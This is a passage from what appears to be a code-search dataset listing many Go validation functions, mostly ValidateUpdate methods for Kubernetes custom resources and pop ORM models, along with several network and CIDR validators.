{\n\t\t\terr := field.Invalid(field.NewPath(\"spec\").Child(\"nodes\").Index(i).Child(\"name\"), nodeName, \"field is immutable\")\n\t\t\tallErrors = append(allErrors, err)\n\t\t}\n\t}\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, n.Name, allErrors)\n\n}", "func ValidateNetworkStatusUpdate(newStatus, oldStatus extensionsv1alpha1.NetworkStatus) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func ValidateNetworkSpecUpdate(new, old *extensionsv1alpha1.NetworkSpec, deletionTimestampSet bool, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif deletionTimestampSet && !apiequality.Semantic.DeepEqual(new, old) {\n\t\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new, old, fldPath)...)\n\t\treturn allErrs\n\t}\n\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.Type, old.Type, fldPath.Child(\"type\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.PodCIDR, old.PodCIDR, fldPath.Child(\"podCIDR\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.ServiceCIDR, old.ServiceCIDR, fldPath.Child(\"serviceCIDR\"))...)\n\n\treturn allErrs\n}", "func (m *AzureManagedControlPlane) validateVirtualNetworkUpdate(old *AzureManagedControlPlane) field.ErrorList {\n\tvar allErrs field.ErrorList\n\tif old.Spec.VirtualNetwork.Name != m.Spec.VirtualNetwork.Name {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.Name\"),\n\t\t\t\tm.Spec.VirtualNetwork.Name,\n\t\t\t\t\"Virtual Network Name is immutable\"))\n\t}\n\n\tif old.Spec.VirtualNetwork.CIDRBlock != m.Spec.VirtualNetwork.CIDRBlock {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.CIDRBlock\"),\n\t\t\t\tm.Spec.VirtualNetwork.CIDRBlock,\n\t\t\t\t\"Virtual Network CIDRBlock is immutable\"))\n\t}\n\n\tif old.Spec.VirtualNetwork.Subnet.Name != m.Spec.VirtualNetwork.Subnet.Name {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.Subnet.Name\"),\n\t\t\t\tm.Spec.VirtualNetwork.Subnet.Name,\n\t\t\t\t\"Subnet Name is immutable\"))\n\t}\n\n\t// NOTE: This only works because we force the user to set the CIDRBlock for both the\n\t// managed and unmanaged Vnets. If we ever update the subnet cidr based on what's\n\t// actually set in the subnet, and it is different from what's in the Spec, for\n\t// unmanaged Vnets like we do with the AzureCluster this logic will break.\n\tif old.Spec.VirtualNetwork.Subnet.CIDRBlock != m.Spec.VirtualNetwork.Subnet.CIDRBlock {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.Subnet.CIDRBlock\"),\n\t\t\t\tm.Spec.VirtualNetwork.Subnet.CIDRBlock,\n\t\t\t\t\"Subnet CIDRBlock is immutable\"))\n\t}\n\n\tif old.Spec.VirtualNetwork.ResourceGroup != m.Spec.VirtualNetwork.ResourceGroup {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.ResourceGroup\"),\n\t\t\t\tm.Spec.VirtualNetwork.ResourceGroup,\n\t\t\t\t\"Virtual Network Resource Group is immutable\"))\n\t}\n\treturn allErrs\n}", "func (r *Node) ValidateUpdate(old runtime.Object) error {\n\tvar allErrors field.ErrorList\n\toldNode := old.(*Node)\n\n\tnodelog.Info(\"validate update\", \"name\", r.Name)\n\n\tallErrors = append(allErrors, r.validate()...)\n\n\tif r.Spec.Network != oldNode.Spec.Network {\n\t\terr := field.Invalid(field.NewPath(\"spec\").Child(\"network\"), r.Spec.Network, \"field is immutable\")\n\t\tallErrors = append(allErrors, err)\n\t}\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, r.Name, allErrors)\n}", "func (z *Zamowienium) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func ValidateNetwork(network *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMeta(&network.ObjectMeta, true, apivalidation.NameIsDNSSubdomain, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpec(&network.Spec, field.NewPath(\"spec\"))...)\n\n\treturn allErrs\n}", "func (m *PVMInstanceNetwork) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func (m *Network) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateMasterInterface(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (in *ManagedCluster) ValidateUpdate(old runtime.Object) error {\n\treturn nil\n}", "func (n *Network) Validate() field.ErrorList {\n\tvar validateErrors field.ErrorList\n\n\t// validate network config (id, genesis, consensus and join)\n\tvalidateErrors = append(validateErrors, n.Spec.NetworkConfig.Validate()...)\n\n\t// validate nodes\n\tvalidateErrors = append(validateErrors, n.ValidateNodes()...)\n\n\treturn validateErrors\n}", "func (g *Group) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (cluster *Cluster) ValidateUpdate(old runtime.Object) error {\n\tklog.Info(\"validate update\", \"name\", cluster.Name)\n\treturn nil\n}", "func (c *Contract) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (m *Move) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (ruleset *DnsForwardingRuleset) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := ruleset.updateValidations()\n\tvar temp any = ruleset\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (s *SocialSecurityNumber) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (net *NetworkUpdateInput) UpdateNetwork() (UpdateNetworkResponse, error) {\n\n\tif status := support.DoesCloudSupports(strings.ToLower(net.Cloud.Name)); status != true {\n\t\treturn UpdateNetworkResponse{}, fmt.Errorf(common.DefaultCloudResponse + \"UpdateNetwork\")\n\t}\n\n\tswitch strings.ToLower(net.Cloud.Name) {\n\tcase \"aws\":\n\n\t\tcreds, err := common.GetCredentials(\n\t\t\t&common.GetCredentialsInput{\n\t\t\t\tProfile: net.Cloud.Profile,\n\t\t\t\tCloud: net.Cloud.Name,\n\t\t\t},\n\t\t)\n\n\t\tif err != nil {\n\t\t\treturn UpdateNetworkResponse{}, err\n\t\t}\n\t\t// I will establish session so that we can carry out the process in cloud\n\t\tsession_input := awssess.CreateSessionInput{Region: net.Cloud.Region, KeyId: creds.KeyId, AcessKey: creds.SecretAccess}\n\t\tsess := session_input.CreateAwsSession()\n\n\t\t//authorizing to request further\n\t\tauthinpt := auth.EstablishConnectionInput{Region: net.Cloud.Region, Resource: \"ec2\", Session: sess}\n\n\t\t// I will call UpdateNetwork of interface and get the things done\n\t\tserverin := awsnetwork.UpdateNetworkInput{\n\t\t\tResource: net.Catageory.Resource,\n\t\t\tAction: net.Catageory.Action,\n\t\t\tGetRaw: net.Cloud.GetRaw,\n\t\t\tNetwork: awsnetwork.NetworkCreateInput{\n\t\t\t\tName: net.Catageory.Name,\n\t\t\t\tVpcCidr: net.Catageory.VpcCidr,\n\t\t\t\tVpcId: net.Catageory.VpcId,\n\t\t\t\tSubCidrs: net.Catageory.SubCidrs,\n\t\t\t\tType: net.Catageory.Type,\n\t\t\t\tPorts: net.Catageory.Ports,\n\t\t\t\tZone: net.Catageory.Zone,\n\t\t\t},\n\t\t}\n\t\tresponse, err := serverin.UpdateNetwork(authinpt)\n\t\tif err != nil {\n\t\t\treturn UpdateNetworkResponse{}, err\n\t\t}\n\t\treturn UpdateNetworkResponse{AwsResponse: response}, nil\n\n\tcase \"azure\":\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultAzResponse}, nil\n\tcase \"gcp\":\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultGcpResponse}, nil\n\tcase \"openstack\":\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultOpResponse}, nil\n\tdefault:\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultCloudResponse + \"NetworkUpdate\"}, nil\n\t}\n}", "func (r *Unit) ValidateUpdate(old runtime.Object) error {\n\tunitlog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn nil\n}", "func (e *Event) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (l *Libvirt) NetworkUpdate(Net Network, Command uint32, Section uint32, ParentIndex int32, XML string, Flags NetworkUpdateFlags) (err error) {\n\tvar buf []byte\n\n\targs := NetworkUpdateArgs {\n\t\tNet: Net,\n\t\tCommand: Command,\n\t\tSection: Section,\n\t\tParentIndex: ParentIndex,\n\t\tXML: XML,\n\t\tFlags: Flags,\n\t}\n\n\tbuf, err = encode(&args)\n\tif err != nil {\n\t\treturn\n\t}\n\n\n\t_, err = l.requestStream(291, constants.Program, buf, nil, nil)\n\tif err != nil {\n\t\treturn\n\t}\n\n\treturn\n}", "func (p *Photo) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (t *Target) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (c *IPPool) ValidateUpdate(old runtime.Object) error {\n\tallErrs := field.ErrorList{}\n\toldM3ipp, ok := old.(*IPPool)\n\tif !ok || oldM3ipp == nil {\n\t\treturn apierrors.NewInternalError(errors.New(\"unable to convert existing object\"))\n\t}\n\n\tif !reflect.DeepEqual(c.Spec.NamePrefix, oldM3ipp.Spec.NamePrefix) {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"spec\", \"NamePrefix\"),\n\t\t\t\tc.Spec.NamePrefix,\n\t\t\t\t\"cannot be modified\",\n\t\t\t),\n\t\t)\n\t}\n\n\tif len(allErrs) == 0 {\n\t\treturn nil\n\t}\n\treturn apierrors.NewInvalid(GroupVersion.WithKind(\"Metal3Data\").GroupKind(), c.Name, allErrs)\n}", "func (h *Handler) ValidateUpdate(ctx context.Context, _, newObj runtime.Object) error {\n\treturn h.handle(ctx, newObj)\n}", "func (policy *ServersConnectionPolicy) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := policy.updateValidations()\n\tvar temp any = policy\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (s *Single) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *Friend) ValidateUpdate(old runtime.Object) error {\n\tfriendlog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn r.validateFriend()\n}", "func (m *NodePoolUpdate) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateInstanceTypes(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (r *KeystoneAPI) ValidateUpdate(old runtime.Object) error {\n\tkeystoneapilog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn nil\n}", "func (t *Thing) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (e *ExternalCfp) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (k *Kategorie) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (t *Task) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (n *Network) ValidateCreate() error {\n\tvar allErrors field.ErrorList\n\n\tnetworklog.Info(\"validate create\", \"name\", n.Name)\n\n\t// shared validation rules with update\n\tallErrors = append(allErrors, n.Validate()...)\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, n.Name, allErrors)\n}", "func (p *Provider) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *Role) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (i *Import) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *Review) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (d *Datasource) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (t *Transaction) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (w *Widget) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (machine *VirtualMachine) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := machine.updateValidations()\n\tvar temp any = machine\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (t *Technology) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *NodeDeployment) ValidateUpdate(old runtime.Object) error {\n\tnodedeploymentlog.Info(\"validate update\", \"name\", r.Name)\n\n\toldNodeDeployment, ok := old.DeepCopyObject().(*NodeDeployment)\n\tif !ok {\n\t\tnodedeploymentlog.Info(\"validate update DeepCopyObject error\")\n\t\treturn fmt.Errorf(\"do not support update operation\")\n\t}\n\tif oldNodeDeployment.Spec.Platform != r.Spec.Platform ||\n\t\toldNodeDeployment.Spec.EdgeNodeName != r.Spec.EdgeNodeName ||\n\t\toldNodeDeployment.Spec.NodeMaintenanceName != r.Spec.NodeMaintenanceName ||\n\t\toldNodeDeployment.Spec.ActionPolicy != r.Spec.ActionPolicy ||\n\t\toldNodeDeployment.Spec.KubeEdgeVersion != r.Spec.KubeEdgeVersion ||\n\t\toldNodeDeployment.Spec.CloudNodeIP != r.Spec.CloudNodeIP {\n\t\tfmt.Println(\"do not support update operation currently, if you want to update the object, please delete it first then re-create\")\n\t\treturn fmt.Errorf(\"do not support update operation\")\n\t} else {\n\t\treturn nil\n\t}\n}", "func (obj *RabbitQueue) ValidateUpdate(old runtime.Object) error {\n\trabbitQueueLog.Info(\"validate update\", \"name\", obj.Name, \"namespace\", obj.Namespace)\n\treturn obj.validate()\n}", "func (t *Test1) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *Water) ValidateUpdate(old runtime.Object) error {\n\t//waterlog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn nil\n}", "func (s *Student) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (c *Chat) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (o *OrderItem) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (m *Map) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (t *TeamResource) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *OperationSet) ValidateUpdate(old runtime.Object) error {\n\toperationsetlog.Info(\"validating update of OperationSet\", \"operationset\", r.Name)\n\n\treturn r.validateOperationSet()\n}", "func (r *Storage) ValidateUpdate(_ runtime.Object) error {\n\tstoragelog.Info(\"validate update\", \"name\", r.Name)\n\treturn r.valid()\n}", "func (b BlueprintReference) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func validateNetwork(t *testing.T, workingDir string) {\n\tterraformOptions := test_structure.LoadTerraformOptions(t, workingDir)\n\n\tsubnetNames := terraformOptions.Vars[\"subnet_names\"].([]interface{})\n\n\toutput := terraform.Output(t, terraformOptions, \"network_id\")\n\tassert.NotEmpty(t, output, \"network_id is empty\")\n\n\tsubnets := terraform.OutputList(t, terraformOptions, \"subnet_ids\")\n\tassert.Len(t, subnets, len(subnetNames), \"`subnet_ids` length is invalid\")\n\n\taddresses := terraform.OutputList(t, terraformOptions, \"subnet_address_ranges\")\n\tassert.Len(t, addresses, len(subnetNames), \"`subnet_address_ranges` length is invalid\")\n\n\t// check addresses\n\tfor _, cidr := range addresses {\n\t\t_, _, err := net.ParseCIDR(cidr)\n\t\tassert.Nil(t, err, \"net.ParseCIDR\")\n\t}\n}", "func (r *OptimJob) ValidateUpdate(old runtime.Object) error {\n\toptimjoblog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn r.validateOptimJob()\n}", "func (r *Room) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (rule *NamespacesEventhubsAuthorizationRule) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := rule.updateValidations()\n\tvar temp any = rule\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (s *Series) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *ScalewayWebhook) ValidateUpdate(ctx context.Context, oldObj runtime.Object, obj runtime.Object) (field.ErrorList, error) {\n\treturn r.ScalewayManager.ValidateUpdate(ctx, oldObj, obj)\n}", "func (p *PlayerShot) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *BackupLocation) ValidateUpdate(old runtime.Object) error {\n\tbackuplocationlog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn nil\n}", "func (r *DaisyInstallation) ValidateUpdate(old runtime.Object) error {\n\tdaisyinstallationlog.Info(\"validate update\", \"name\", r.Name)\n\tif err := ValidateStorageLimit(r); err != nil {\n\t\treturn err\n\t}\n\tif err := ValidateScalInOut(r, old); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (c *CourseCode) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (m *NetworkPolicy) Validate() error {\n\treturn m.validate(false)\n}", "func (a *Application) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (j *Job) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (c *KubeadmConfig) ValidateUpdate(_ runtime.Object) (admission.Warnings, error) {\n\treturn nil, c.Spec.validate(c.Name)\n}", "func (p *PersonallyProcuredMove) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (b *BudgetLine) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (q *Quest) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (e NetEvent) Validate() (bool, error) {\n\tif !e.isValidated {\n\t\tif e.NetDevice == \"\" {\n\t\t\treturn false, fmt.Errorf(\"source device for event not specified\")\n\t\t}\n\t}\n\treturn true, nil\n}", "func (r *Adapter) ValidateUpdate(old runtime.Object) error {\n\t// TODO check for immutable fields\n\treturn r.Validate().ToAggregate()\n}", "func (n NetworkConfig) validate() error {\n\tif n.IsEmpty() {\n\t\treturn nil\n\t}\n\tif err := n.VPC.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"vpc\": %w`, err)\n\t}\n\tif err := n.Connect.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"connect\": %w`, err)\n\t}\n\treturn nil\n}", "func (o *OrganizerInvitation) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func validateNetworkInputs(p netintents.Network) error {\n\t// validate name\n\terrs := validation.IsValidName(p.Metadata.Name)\n\tif len(errs) > 0 {\n\t\treturn pkgerrors.Errorf(\"Invalid network name - name=[%v], errors: %v\", p.Metadata.Name, errs)\n\t}\n\n\t// validate cni type\n\tfound := false\n\tfor _, val := range nettypes.CNI_TYPES {\n\t\tif p.Spec.CniType == val {\n\t\t\tfound = true\n\t\t\tbreak\n\t\t}\n\t}\n\tif !found {\n\t\treturn pkgerrors.Errorf(\"Invalid cni type: %v\", p.Spec.CniType)\n\t}\n\n\tsubnets := p.Spec.Ipv4Subnets\n\tfor _, subnet := range subnets {\n\t\terr := nettypes.ValidateSubnet(subnet)\n\t\tif err != nil {\n\t\t\treturn pkgerrors.Wrap(err, \"invalid subnet\")\n\t\t}\n\t}\n\treturn nil\n}", "func (c *CRDClient) UpdateNetwork(network *crv1.Network) {\n\terr := c.Client.Put().\n\t\tName(network.Name).\n\t\tNamespace(network.Namespace).\n\t\tResource(crv1.NetworkResourcePlural).\n\t\tBody(network).\n\t\tDo().\n\t\tError()\n\n\tif err != nil {\n\t\tglog.Errorf(\"ERROR updating network: %v\\n\", err)\n\t} else {\n\t\tglog.V(3).Infof(\"UPDATED network: %#v\\n\", network)\n\t}\n}", "func validateExternalNetwork(ctx context.Context, cli client.Client, externalNetwork string) error {\n\tinstance := &crdv1.ExternalNetwork{}\n\tkey := types.NamespacedName{Name: externalNetwork}\n\terr := cli.Get(ctx, key, instance)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (record *PrivateDnsZonesSRVRecord) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := record.updateValidations()\n\tvar temp any = record\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func ValidateNetworkSpec(spec *extensionsv1alpha1.NetworkSpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif len(spec.Type) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"type\"), \"field is required\"))\n\t}\n\n\tvar cidrs []cidrvalidation.CIDR\n\n\tif len(spec.PodCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"podCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.PodCIDR, fldPath.Child(\"podCIDR\")))\n\t}\n\n\tif len(spec.ServiceCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"serviceCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.ServiceCIDR, fldPath.Child(\"serviceCIDR\")))\n\t}\n\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDRParse(cidrs...)...)\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDROverlap(cidrs, cidrs, false)...)\n\n\treturn allErrs\n}", "func (u *User) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (u *User) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (u *User) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (u *User) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (u *User) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (r *RoomOccupancy) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (c *TestClusterGKE) ValidateUpdate(old runtime.Object) error {\n\to := old.(*TestClusterGKE)\n\tlog.V(1).Info(\"validate update\", \"namespace\", c.Namespace, \"name\", c.Name, \"new.Spec\", c.Spec, \"new.Status\", c.Status, \"old.Spec\", o.Spec, \"old.Status\", o.Status)\n\tif !equality.Semantic.DeepEqual(c.Spec, o.Spec) {\n\t\treturn errors.New(\"spec updates are not supported\")\n\t}\n\treturn nil\n}", "func (d *DataMap) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func ValidateNetworks(Validations Validations, Service types.ServiceConfig) error {\n\tfor Network := range Service.Networks {\n\t\tif !goutil.StringInSlice(Network, Validations.Networks) {\n\t\t\treturn fmt.Errorf(\"Network '%s' not in the whitelist\", Network)\n\t\t}\n\t}\n\treturn nil\n}", "func ValidateNetworkMode(c *Config) error {\n\tif c.General.Mode == \"\" {\n\t\tc.General.Mode = DefaultNetMode\n\t}\n\tc.General.Mode = strings.ToLower(c.General.Mode)\n\tswitch c.General.Mode {\n\tcase DualStackNetMode:\n\t\tfallthrough\n\tcase IPv4NetMode:\n\t\tfallthrough\n\tcase IPv6NetMode:\n\t\tglog.Infof(\"Building cluster in mode %q\", c.General.Mode)\n\tdefault:\n\t\treturn fmt.Errorf(\"unsupported network mode %q entered\", c.General.Mode)\n\t}\n\treturn nil\n}", "func (m *NetworkResource) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateIPAM(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateIndexConfigs(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (r *MetadataBackupPolicy) ValidateUpdate(old runtime.Object) error {\n\tlog.Info(\"validate update\", \"name\", r.Name)\n\treturn r.validatePolicy()\n}", "func (p *PullrequestAssignee) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (f *Featured) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (Strategy) ValidateUpdate(ctx kapi.Context, obj, old runtime.Object) field.ErrorList {\n\treturn validation.ValidateServiceBrokerUpdate(obj.(*api.ServiceBroker),old.(*api.ServiceBroker))\n}", "func (m *RecoveryPlanNetworkInfo) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateNetworkMapping(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStaticIPAssignment(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (r *M4DApplication) ValidateUpdate(old runtime.Object) error {\n\tlog.Printf(\"Validating m4dapplication %s for update\", r.Name)\n\n\treturn r.validateM4DApplication()\n}", "func (r *Domain) ValidateUpdate(old runtime.Object) error {\n\tdomainlog.Info(\"validate update\", \"name\", r.Name)\n\n\toldDomain, ok := old.(*Domain)\n\n\tif !ok {\n\t\treturn fmt.Errorf(\"old is not *Domain, %+v\", old)\n\t}\n\n\tif oldDomain.Spec.Domain != r.Spec.Domain {\n\t\treturn fmt.Errorf(\"domain is immutable, should not change it, old: %+v, new: %+v\", oldDomain, r)\n\t}\n\n\treturn nil\n}" ]
